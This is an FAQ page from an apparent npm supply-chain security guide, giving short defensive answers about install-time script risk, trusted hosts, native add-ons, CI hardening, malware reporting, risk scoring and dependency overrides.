FAQ
Quick answers to common questions about npm malware and risk.
Is child_process always bad?
No. It’s common in build tools and native compiles. Risk rises when used in lifecycle scripts or combined with network/obfuscation.
Why focus on install‑time?
Install‑time runs before import and can access the environment and filesystem, enabling credential theft and payload drops.
What hosts are considered trusted?
Your registry and official GitHub Releases/CDNs of the same project. Unknown domains or personal servers are high risk.
Are native add‑ons safe?
They can be. Prefer builds from source or verified release binaries. Require checksums/signatures and avoid shell pipes.
Does pnpm/yarn reduce risk?
They improve workflows but don’t eliminate install‑time risk. Use ignore‑scripts in CI, allowlists, and egress restrictions regardless of the client.
How do I report suspected malware?
File reports with the registry security team and the project repo (if legit). Include tarball, diff, versions, and observed behavior.
How can I compute a risk score?
Use the Auto‑Score Flags; sum points from fired signals. Block merges when score exceeds your threshold and log which signals fired.
What if a package truly needs postinstall?
Whitelist the package, verify hosts, run with --network=none unless required, and enforce checksum/signature verification.
When should we use package.json overrides for safety?
Use overrides when a risky release or mismatched transitive versions could break or expose you. Overrides force specific versions across your dependency tree until upstream fixes land. Example: align React and React DOM to the same safe version (e.g., ^18.3.1) to avoid API mismatches or compromised transitive pulls.